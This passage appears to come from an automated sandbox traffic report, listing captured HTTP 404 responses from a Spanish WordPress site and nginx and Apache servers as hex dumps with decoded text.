6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:08:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 02 Sep 2024 07:08:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 02 Sep 2024 07:08:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 02 Sep 2024 07:08:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 02 Sep 2024 07:08:46 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:08:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:08:55 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:08:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Sep 2024 07:09:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Sep 2024 07:09:06 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 